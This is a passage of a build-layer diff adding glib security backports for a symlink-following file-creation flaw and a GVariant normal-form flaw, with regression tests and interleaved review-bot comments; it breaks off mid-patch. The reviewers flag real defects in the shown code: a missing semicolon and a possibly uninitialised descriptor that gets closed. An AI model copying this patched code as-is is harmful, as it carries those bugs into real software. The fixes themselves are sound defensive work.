+Subject: [PATCH 2/5] tests: Stop using g_test_bug_base() in file tests
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Since a following commit is going to add a new test which references
+Gitlab, so it’s best to move the URI bases inside the test cases.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/file.c | 4 +---
+ 1 file changed, 1 insertion(+), 3 deletions(-)
+
+--- a/gio/tests/file.c
++++ b/gio/tests/file.c
+@@ -685,7 +685,7 @@ test_replace_cancel (void)
+ guint count;
+ GError *error = NULL;
+
+- g_test_bug ("629301");
++ g_test_bug ("https://bugzilla.gnome.org/629301");
+
+ path = g_dir_make_tmp ("g_file_replace_cancel_XXXXXX", &error);
+ g_assert_no_error (error);
+@@ -1784,8 +1784,6 @@ main (int argc, char *argv[])
+ {
+ g_test_init (&argc, &argv, NULL);
+
+- g_test_bug_base ("http://bugzilla.gnome.org/");
+-
+ g_test_add_func ("/file/basic", test_basic);
+ g_test_add_func ("/file/build-filename", test_build_filename);
+ g_test_add_func ("/file/parent", test_parent);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch
new file mode 100644
index 0000000000..a82febd26e
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch
@@ -0,0 +1,57 @@
+Backport of:
+
+From ce0eb088a68171eed3ac217cb92a72e36eb57d1b Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Mar 2021 16:05:55 +0000
+Subject: [PATCH 3/5] glocalfileoutputstream: Factor out a flag check
+
+This clarifies the code a little. It introduces no functional changes.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 7 ++++---
+ 1 file changed, 4 insertions(+), 3 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -847,6 +847,7 @@ handle_overwrite_open (const char *fi
+ int res;
+ int mode;
+ int errsv;
++ gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION);
+
+ mode = mode_from_flags_or_info (flags, reference_info);
+
+@@ -954,7 +955,7 @@ handle_overwrite_open (const char *fi
+ * to a backup file and rewrite the contents of the file.
+ */
+
+- if ((flags & G_FILE_CREATE_REPLACE_DESTINATION) ||
++ if (replace_destination_set ||
+ (!(original_stat.st_nlink > 1) && !is_symlink))
+ {
+ char *dirname, *tmp_filename;
+@@ -973,7 +974,7 @@ handle_overwrite_open (const char *fi
+
+ /* try to keep permissions (unless replacing) */
+
+- if ( ! (flags & G_FILE_CREATE_REPLACE_DESTINATION) &&
++ if (!replace_destination_set &&
+ (
+ #ifdef HAVE_FCHOWN
+ fchown (tmpfd, original_stat.st_uid, original_stat.st_gid) == -1 ||
+@@ -1112,7 +1113,7 @@ handle_overwrite_open (const char *fi
+ }
+ }
+
+- if (flags & G_FILE_CREATE_REPLACE_DESTINATION)
++ if (replace_destination_set)
+ {
+ g_close (fd, NULL);
+
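Review bot: `gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION);` stores the raw mask result, so when the flag is set the variable holds the flag's bit value rather than TRUE. The three uses in this patch only test truthiness, so behaviour is unchanged, but a later `== TRUE` comparison would silently fail. Writing `gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION) != 0;` avoids that. `handle_overwrite_open` starts and ends outside these hunks.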
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
new file mode 100644
index 0000000000..5b106e8474
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
@@ -0,0 +1,265 @@
+Backport of:
+
+From 317b3b587058a05dca95d56dac26568c5b098d33 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:36:07 +0000
+Subject: [PATCH 4/5] glocalfileoutputstream: Fix CREATE_REPLACE_DESTINATION
+ with symlinks
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The `G_FILE_CREATE_REPLACE_DESTINATION` flag is equivalent to unlinking
+the destination file and re-creating it from scratch. That did
+previously work, but in the process the code would call `open(O_CREAT)`
+on the file. If the file was a dangling symlink, this would create the
+destination file (empty). That’s not an intended side-effect, and has
+security implications if the symlink is controlled by a lower-privileged
+process.
+
+Fix that by not opening the destination file if it’s a symlink, and
+adjusting the rest of the code to cope with
+ - the fact that `fd == -1` is not an error iff `is_symlink` is true,
+ - and that `original_stat` will contain the `lstat()` results for the
+ symlink now, rather than the `stat()` results for its target (again,
+ iff `is_symlink` is true).
+
+This means that the target of the dangling symlink is no longer created,
+which was the bug. The symlink itself continues to be replaced (as
+before) with the new file — this is the intended behaviour of
+`g_file_replace()`.
+
+The behaviour for non-symlink cases, or cases where the symlink was not
+dangling, should be unchanged.
+
+Includes a unit test.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2325
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 77 ++++++++++++++++++-------
+ gio/tests/file.c | 108 +++++++++++++++++++++++++++++++++++
+ 2 files changed, 163 insertions(+), 22 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -875,16 +875,22 @@ handle_overwrite_open (const char *fi
+ /* Could be a symlink, or it could be a regular ELOOP error,
+ * but then the next open will fail too. */
+ is_symlink = TRUE;
+- fd = g_open (filename, open_flags, mode);
++ if (!replace_destination_set)
++ fd = g_open (filename, open_flags, mode);
+ }
+-#else
+- fd = g_open (filename, open_flags, mode);
+- errsv = errno;
++#else /* if !O_NOFOLLOW */
+ /* This is racy, but we do it as soon as possible to minimize the race */
+ is_symlink = g_file_test (filename, G_FILE_TEST_IS_SYMLINK);
++
++ if (!is_symlink || !replace_destination_set)
++ {
++ fd = g_open (filename, open_flags, mode);
++ errsv = errno;
++ }
+ #endif
+
+- if (fd == -1)
++ if (fd == -1 &&
++ (!is_symlink || !replace_destination_set))
+ {
+ char *display_name = g_filename_display_name (filename);
+ g_set_error (error, G_IO_ERROR,
+@@ -898,7 +904,14 @@ handle_overwrite_open (const char *fi
+ #ifdef G_OS_WIN32
+ res = GLIB_PRIVATE_CALL (g_win32_fstat) (fd, &original_stat);
+ #else
+- res = fstat (fd, &original_stat);
++ if (!is_symlink)
++ {
++ res = fstat (fd, &original_stat);
++ }
++ else
++ {
++ res = lstat (filename, &original_stat);
++ }
+ #endif
+ errsv = errno;
+
+@@ -917,16 +930,27 @@ handle_overwrite_open (const char *fi
+ if (!S_ISREG (original_stat.st_mode))
+ {
+ if (S_ISDIR (original_stat.st_mode))
+- g_set_error_literal (error,
+- G_IO_ERROR,
+- G_IO_ERROR_IS_DIRECTORY,
+- _("Target file is a directory"));
+- else
+- g_set_error_literal (error,
++ {
++ g_set_error_literal (error,
++ G_IO_ERROR,
++ G_IO_ERROR_IS_DIRECTORY,
++ _("Target file is a directory"));
++ goto err_out;
++ }
++ else if (!is_symlink ||
++#ifdef S_ISLNK
++ !S_ISLNK (original_stat.st_mode)
++#else
++ FALSE
++#endif
++ )
++ {
++ g_set_error_literal (error,
+ G_IO_ERROR,
+ G_IO_ERROR_NOT_REGULAR_FILE,
+ _("Target file is not a regular file"));
+- goto err_out;
++ goto err_out;
++ }
+ }
+
+ if (etag != NULL)
+@@ -1007,7 +1031,8 @@ handle_overwrite_open (const char *fi
+ }
+ }
+
+- g_close (fd, NULL);
++ if (fd >= 0)
++ g_close (fd, NULL);
+ *temp_filename = tmp_filename;
+ return tmpfd;
+ }
+--- a/gio/tests/file.c
++++ b/gio/tests/file.c
+@@ -804,6 +804,113 @@ test_replace_cancel (void)
+ g_object_unref (tmpdir);
+ }
+
++static void
++test_replace_symlink (void)
++{
++#ifdef G_OS_UNIX
++ gchar *tmpdir_path = NULL;
++ GFile *tmpdir = NULL, *source_file = NULL, *target_file = NULL;
++ GFileOutputStream *stream = NULL;
++ const gchar *new_contents = "this is a test message which should be written to source and not target";
++ gsize n_written;
++ GFileEnumerator *enumerator = NULL;
++ GFileInfo *info = NULL;
++ gchar *contents = NULL;
++ gsize length = 0;
++ GError *local_error = NULL;
++
++ g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2325");
++ g_test_summary ("Test that G_FILE_CREATE_REPLACE_DESTINATION doesn’t follow symlinks");
++
++ /* Create a fresh, empty working directory. */
++ tmpdir_path = g_dir_make_tmp ("g_file_replace_symlink_XXXXXX", &local_error);
++ g_assert_no_error (local_error);
++ tmpdir = g_file_new_for_path (tmpdir_path);
++
++ g_test_message ("Using temporary directory %s", tmpdir_path);
++ g_free (tmpdir_path);
++
++ /* Create symlink `source` which points to `target`. */
++ source_file = g_file_get_child (tmpdir, "source");
++ target_file = g_file_get_child (tmpdir, "target");
++ g_file_make_symbolic_link (source_file, "target", NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ /* Ensure that `target` doesn’t exist */
++ g_assert_false (g_file_query_exists (target_file, NULL));
++
++ /* Replace the `source` symlink with a regular file using
++ * %G_FILE_CREATE_REPLACE_DESTINATION, which should replace it *without*
++ * following the symlink */
++ stream = g_file_replace (source_file, NULL, FALSE /* no backup */,
++ G_FILE_CREATE_REPLACE_DESTINATION, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_output_stream_write_all (G_OUTPUT_STREAM (stream), new_contents, strlen (new_contents),
++ &n_written, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_assert_cmpint (n_written, ==, strlen (new_contents));
++
++ g_output_stream_close (G_OUTPUT_STREAM (stream), NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_clear_object (&stream);
++
++ /* At this point, there should still only be one file: `source`. It should
++ * now be a regular file. `target` should not exist. */
++ enumerator = g_file_enumerate_children (tmpdir,
++ G_FILE_ATTRIBUTE_STANDARD_NAME ","
++ G_FILE_ATTRIBUTE_STANDARD_TYPE,
++ G_FILE_QUERY_INFO_NOFOLLOW_SYMLINKS, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_assert_nonnull (info);
++
++ g_assert_cmpstr (g_file_info_get_name (info), ==, "source");
++ g_assert_cmpint (g_file_info_get_file_type (info), ==, G_FILE_TYPE_REGULAR);
++
++ g_clear_object (&info);
++
++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_assert_null (info);
++
++ g_file_enumerator_close (enumerator, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_clear_object (&enumerator);
++
++ /* Double-check that `target` doesn’t exist */
++ g_assert_false (g_file_query_exists (target_file, NULL));
++
++ /* Check the content of `source`. */
++ g_file_load_contents (source_file,
++ NULL,
++ &contents,
++ &length,
++ NULL,
++ &local_error);
++ g_assert_no_error (local_error);
++ g_assert_cmpstr (contents, ==, new_contents);
++ g_assert_cmpuint (length, ==, strlen (new_contents));
++ g_free (contents);
++
++ /* Tidy up. */
++ g_file_delete (source_file, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_file_delete (tmpdir, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_clear_object (&target_file);
++ g_clear_object (&source_file);
++ g_clear_object (&tmpdir);
++#else /* if !G_OS_UNIX */
++ g_test_skip ("Symlink replacement tests can only be run on Unix")
++#endif
++}
++
+ static void
+ on_file_deleted (GObject *object,
+ GAsyncResult *result,
+@@ -1752,6 +1859,7 @@ main (int argc, char *argv[])
+ g_test_add_data_func ("/file/async-create-delete/4096", GINT_TO_POINTER (4096), test_create_delete);
+ g_test_add_func ("/file/replace-load", test_replace_load);
+ g_test_add_func ("/file/replace-cancel", test_replace_cancel);
++ g_test_add_func ("/file/replace-symlink", test_replace_symlink);
+ g_test_add_func ("/file/async-delete", test_async_delete);
+ #ifdef G_OS_UNIX
+ g_test_add_func ("/file/copy-preserve-mode", test_copy_preserve_mode);
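Review bot: In the `#else /* if !O_NOFOLLOW */` branch, `fd` is assigned only inside `if (!is_symlink || !replace_destination_set)`, so for a symlink with `G_FILE_CREATE_REPLACE_DESTINATION` the later `fd == -1` test and the new `if (fd >= 0) g_close (fd, NULL);` read a value these hunks never set. The declaration of `fd` is outside the hunks; unless it is initialised to -1 there, that path could close an unrelated descriptor, so I would set `fd = -1;` explicitly before the `g_file_test ()` call. Separately, in `test_replace_symlink` the `g_test_skip (...)` line in the `!G_OS_UNIX` branch lacks its terminating `;` and will not compile where that branch is built.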
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch
new file mode 100644
index 0000000000..2334147f7d
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch
@@ -0,0 +1,55 @@
+From 6c6439261bc7a8a0627519848a7222b3e1bd4ffe Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:42:24 +0000
+Subject: [PATCH 5/5] glocalfileoutputstream: Add a missing O_CLOEXEC flag to
+ replace()
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -58,6 +58,12 @@
+ #define O_BINARY 0
+ #endif
+
++#ifndef O_CLOEXEC
++#define O_CLOEXEC 0
++#else
++#define HAVE_O_CLOEXEC 1
++#endif
++
+ struct _GLocalFileOutputStreamPrivate {
+ char *tmp_filename;
+ char *original_filename;
+@@ -1223,7 +1229,7 @@ _g_local_file_output_stream_replace (con
+ sync_on_close = FALSE;
+
+ /* If the file doesn't exist, create it */
+- open_flags = O_CREAT | O_EXCL | O_BINARY;
++ open_flags = O_CREAT | O_EXCL | O_BINARY | O_CLOEXEC;
+ if (readable)
+ open_flags |= O_RDWR;
+ else
+@@ -1253,8 +1259,11 @@ _g_local_file_output_stream_replace (con
+ set_error_from_open_errno (filename, error);
+ return NULL;
+ }
+-
+-
++#if !defined(HAVE_O_CLOEXEC) && defined(F_SETFD)
++ else
++ fcntl (fd, F_SETFD, FD_CLOEXEC);
++#endif
++
+ stream = g_object_new (G_TYPE_LOCAL_FILE_OUTPUT_STREAM, NULL);
+ stream->priv->fd = fd;
+ stream->priv->sync_on_close = sync_on_close;
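Review bot: `O_CLOEXEC` is added only to the `O_CREAT | O_EXCL` open in `_g_local_file_output_stream_replace`, and the `fcntl (fd, F_SETFD, FD_CLOEXEC)` fallback is attached as an `else` to the error branch shown just above it. Whether descriptors obtained through `handle_overwrite_open` are also close-on-exec cannot be seen from here: this patch does not touch that function, and its `open_flags = O_RDWR | O_CREAT | O_BINARY` (context in CVE-2021-28153-1.patch) has no such flag, so it is worth confirming that the overwrite path cannot leave a descriptor inheritable by child processes. The fallback's return value is also ignored; a short comment such as `/* best effort: not atomic with open(), a concurrent fork+exec can still inherit fd */` would record why. Both functions continue outside the hunks.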
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch
new file mode 100644
index 0000000000..ce90586290
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch
@@ -0,0 +1,290 @@
+From 5f4485c4ff57fdefb1661531788def7ca5a47328 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 04:19:44 +0000
+Subject: [PATCH] gvariant-serialiser: Check offset table entry size is minimal
+
+The entries in an offset table (which is used for variable sized arrays
+and tuples containing variable sized members) are sized so that they can
+address every byte in the overall variant.
+
+The specification requires that for a variant to be in normal form, its
+offset table entries must be the minimum width such that they can
+address every byte in the variant.
+
+That minimality requirement was not checked in
+`g_variant_is_normal_form()`, leading to two different byte arrays being
+interpreted as the normal form of a given variant tree. That kind of
+confusion could potentially be exploited, and is certainly a bug.
+
+Fix it by adding the necessary checks on offset table entry width, and
+unit tests.
+
+Spotted by William Manley.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2794
+
+CVE: CVE-2023-29499
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/5f4485c4ff57fdefb1661531788def7ca5a47328]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 19 +++-
+ glib/tests/gvariant.c | 176 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 194 insertions(+), 1 deletion(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 0bf7243..5aa2cbc 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -694,6 +694,10 @@ gvs_variable_sized_array_get_frame_offsets (GVariantSerialised value)
+ out.data_size = last_end;
+ out.array = value.data + last_end;
+ out.length = offsets_array_size / out.offset_size;
++
++ if (out.length > 0 && gvs_calculate_total_size (last_end, out.length) != value.size)
++ return out; /* offset size not minimal */
++
+ out.is_normal = TRUE;
+
+ return out;
+@@ -1201,6 +1205,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ gsize length;
+ gsize offset;
+ gsize i;
++ gsize offset_table_size;
+
+ /* as per the comment in gvs_tuple_get_child() */
+ if G_UNLIKELY (value.data == NULL && value.size != 0)
+@@ -1305,7 +1310,19 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ }
+ }
+
+- return offset_ptr == offset;
++ /* @offset_ptr has been counting backwards from the end of the variant, to
++ * find the beginning of the offset table. @offset has been counting forwards
++ * from the beginning of the variant to find the end of the data. They should
++ * have met in the middle. */
++ if (offset_ptr != offset)
++ return FALSE;
++
++ offset_table_size = value.size - offset_ptr;
++ if (value.size > 0 &&
++ gvs_calculate_total_size (offset, offset_table_size / offset_size) != value.size)
++ return FALSE; /* offset size not minimal */
++
++ return TRUE;
+ }
+
+ /* Variants {{{2
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index d640c81..4ce0e4f 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -5092,6 +5092,86 @@ test_normal_checking_array_offsets2 (void)
+ g_variant_unref (variant);
+ }
+
++/* Test that an otherwise-valid serialised GVariant is considered non-normal if
++ * its offset table entries are too wide.
++ *
++ * See §2.3.6 (Framing Offsets) of the GVariant specification. */
++static void
++test_normal_checking_array_offsets_minimal_sized (void)
++{
++ GVariantBuilder builder;
++ gsize i;
++ GVariant *aay_constructed = NULL;
++ const guint8 *data = NULL;
++ guint8 *data_owned = NULL;
++ GVariant *aay_deserialised = NULL;
++ GVariant *aay_normalised = NULL;
++
++ /* Construct an array of type aay, consisting of 128 elements which are each
++ * an empty array, i.e. `[[] * 128]`. This is chosen because the inner
++ * elements are variable sized (making the outer array variable sized, so it
++ * must have an offset table), but they are also zero-sized when serialised.
++ * So the serialised representation of @aay_constructed consists entirely of
++ * its offset table, which is entirely zeroes.
++ *
++ * The array is chosen to be 128 elements long because that means offset
++ * table entries which are 1 byte long. If the elements in the array were
++ * non-zero-sized (to the extent that the overall array is ≥256 bytes long),
++ * the offset table entries would end up being 2 bytes long. */
++ g_variant_builder_init (&builder, G_VARIANT_TYPE ("aay"));
++
++ for (i = 0; i < 128; i++)
++ g_variant_builder_add_value (&builder, g_variant_new_array (G_VARIANT_TYPE_BYTE, NULL, 0));
++
++ aay_constructed = g_variant_builder_end (&builder);
++
++ /* Verify that the constructed array is in normal form, and its serialised
++ * form is `b'\0' * 128`. */
++ g_assert_true (g_variant_is_normal_form (aay_constructed));
++ g_assert_cmpuint (g_variant_n_children (aay_constructed), ==, 128);
++ g_assert_cmpuint (g_variant_get_size (aay_constructed), ==, 128);
++
++ data = g_variant_get_data (aay_constructed);
++ for (i = 0; i < g_variant_get_size (aay_constructed); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Construct a serialised `aay` GVariant which is `b'\0' * 256`. This has to
++ * be a non-normal form of `[[] * 128]`, with 2-byte-long offset table
++ * entries, because each offset table entry has to be able to reference all of
++ * the byte boundaries in the container. All the entries in the offset table
++ * are zero, so all the elements of the array are zero-sized. */
++ data = data_owned = g_malloc0 (256);
++ aay_deserialised = g_variant_new_from_data (G_VARIANT_TYPE ("aay"),
++ data,
++ 256,
++ FALSE,
++ g_free,
++ g_steal_pointer (&data_owned));
++
++ g_assert_false (g_variant_is_normal_form (aay_deserialised));
++ g_assert_cmpuint (g_variant_n_children (aay_deserialised), ==, 128);
++ g_assert_cmpuint (g_variant_get_size (aay_deserialised), ==, 256);
++
++ data = g_variant_get_data (aay_deserialised);
++ for (i = 0; i < g_variant_get_size (aay_deserialised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Get its normal form. That should change the serialised size. */
++ aay_normalised = g_variant_get_normal_form (aay_deserialised);
++
++ g_assert_true (g_variant_is_normal_form (aay_normalised));
++ g_assert_cmpuint (g_variant_n_children (aay_normalised), ==, 128);
++ g_assert_cmpuint (g_variant_get_size (aay_normalised), ==, 128);
++
++ data = g_variant_get_data (aay_normalised);
++ for (i = 0; i < g_variant_get_size (aay_normalised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ g_variant_unref (aay_normalised);
++ g_variant_unref (aay_deserialised);
++ g_variant_unref (aay_constructed);
++}
++
+ /* Test that a tuple with invalidly large values in its offset table is
+ * normalised successfully without looping infinitely. */
+ static void
+@@ -5286,6 +5366,98 @@ test_normal_checking_tuple_offsets4 (void)
+ g_variant_unref (variant);
+ }
+
++/* Test that an otherwise-valid serialised GVariant is considered non-normal if
++ * its offset table entries are too wide.
++ *
++ * See §2.3.6 (Framing Offsets) of the GVariant specification. */
++static void
++test_normal_checking_tuple_offsets_minimal_sized (void)
++{
++ GString *type_string = NULL;
++ GVariantBuilder builder;
++ gsize i;
++ GVariant *ray_constructed = NULL;
++ const guint8 *data = NULL;
++ guint8 *data_owned = NULL;
++ GVariant *ray_deserialised = NULL;
++ GVariant *ray_normalised = NULL;
++
++ /* Construct a tuple of type (ay…ay), consisting of 129 members which are each
++ * an empty array, i.e. `([] * 129)`. This is chosen because the inner
++ * members are variable sized, so the outer tuple must have an offset table,
++ * but they are also zero-sized when serialised. So the serialised
++ * representation of @ray_constructed consists entirely of its offset table,
++ * which is entirely zeroes.
++ *
++ * The tuple is chosen to be 129 members long because that means it has 128
++ * offset table entries which are 1 byte long each. If the members in the
++ * tuple were non-zero-sized (to the extent that the overall tuple is ≥256
++ * bytes long), the offset table entries would end up being 2 bytes long.
++ *
++ * 129 members are used unlike 128 array elements in
++ * test_normal_checking_array_offsets_minimal_sized(), because the last member
++ * in a tuple never needs an offset table entry. */
++ type_string = g_string_new ("");
++ g_string_append_c (type_string, '(');
++ for (i = 0; i < 129; i++)
++ g_string_append (type_string, "ay");
++ g_string_append_c (type_string, ')');
++
++ g_variant_builder_init (&builder, G_VARIANT_TYPE (type_string->str));
++
++ for (i = 0; i < 129; i++)
++ g_variant_builder_add_value (&builder, g_variant_new_array (G_VARIANT_TYPE_BYTE, NULL, 0));
++
++ ray_constructed = g_variant_builder_end (&builder);
++
++ /* Verify that the constructed tuple is in normal form, and its serialised
++ * form is `b'\0' * 128`. */
++ g_assert_true (g_variant_is_normal_form (ray_constructed));
++ g_assert_cmpuint (g_variant_n_children (ray_constructed), ==, 129);
++ g_assert_cmpuint (g_variant_get_size (ray_constructed), ==, 128);
++
++ data = g_variant_get_data (ray_constructed);
++ for (i = 0; i < g_variant_get_size (ray_constructed); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Construct a serialised `(ay…ay)` GVariant which is `b'\0' * 256`. This has
++ * to be a non-normal form of `([] * 129)`, with 2-byte-long offset table
++ * entries, because each offset table entry has to be able to reference all of
++ * the byte boundaries in the container. All the entries in the offset table
++ * are zero, so all the members of the tuple are zero-sized. */
++ data = data_owned = g_malloc0 (256);
++ ray_deserialised = g_variant_new_from_data (G_VARIANT_TYPE (type_string->str),
++ data,
++ 256,
++ FALSE,
++ g_free,
++ g_steal_pointer (&data_owned));
++
++ g_assert_false (g_variant_is_normal_form (ray_deserialised));
++ g_assert_cmpuint (g_variant_n_children (ray_deserialised), ==, 129);
++ g_assert_cmpuint (g_variant_get_size (ray_deserialised), ==, 256);
++
++ data = g_variant_get_data (ray_deserialised);
++ for (i = 0; i < g_variant_get_size (ray_deserialised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Get its normal form. That should change the serialised size. */
++ ray_normalised = g_variant_get_normal_form (ray_deserialised);
++
++ g_assert_true (g_variant_is_normal_form (ray_normalised));
++ g_assert_cmpuint (g_variant_n_children (ray_normalised), ==, 129);
++ g_assert_cmpuint (g_variant_get_size (ray_normalised), ==, 128);
++
++ data = g_variant_get_data (ray_normalised);
++ for (i = 0; i < g_variant_get_size (ray_normalised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ g_variant_unref (ray_normalised);
++ g_variant_unref (ray_deserialised);
++ g_variant_unref (ray_constructed);
++ g_string_free (type_string, TRUE);
++}
++
+ /* Test that an empty object path is normalised successfully to the base object
+ * path, ‘/’. */
+ static void
+@@ -5431,6 +5603,8 @@ main (int argc, char **argv)
+ test_normal_checking_array_offsets);
+ g_test_add_func ("/gvariant/normal-checking/array-offsets2",
+ test_normal_checking_array_offsets2);
++ g_test_add_func ("/gvariant/normal-checking/array-offsets/minimal-sized",
++ test_normal_checking_array_offsets_minimal_sized);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
+ test_normal_checking_tuple_offsets);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets2",
+@@ -5439,6 +5613,8 @@ main (int argc, char **argv)
+ test_normal_checking_tuple_offsets3);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
+ test_normal_checking_tuple_offsets4);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets/minimal-sized",
++ test_normal_checking_tuple_offsets_minimal_sized);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+ test_normal_checking_empty_object_path);
+
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch
new file mode 100644
index 0000000000..b2187f2af9
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch
@@ -0,0 +1,89 @@
+From 1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:04:49 +0000
+Subject: [PATCH] gvariant-core: Consolidate construction of
+ `GVariantSerialised`
+
+So I only need to change it in one place.
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 8 +++++---
+ glib/tests/gvariant.c | 24 ++++++++++++++++++++++++
+ 2 files changed, 29 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index 8ba701e..4dbd9e8 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5952,14 +5952,16 @@ g_variant_byteswap (GVariant *value)
+ g_variant_serialised_byteswap (serialised);
+
+ bytes = g_bytes_new_take (serialised.data, serialised.size);
+- new = g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE);
++ new = g_variant_ref_sink (g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE));
+ g_bytes_unref (bytes);
+ }
+ else
+ /* contains no multi-byte data */
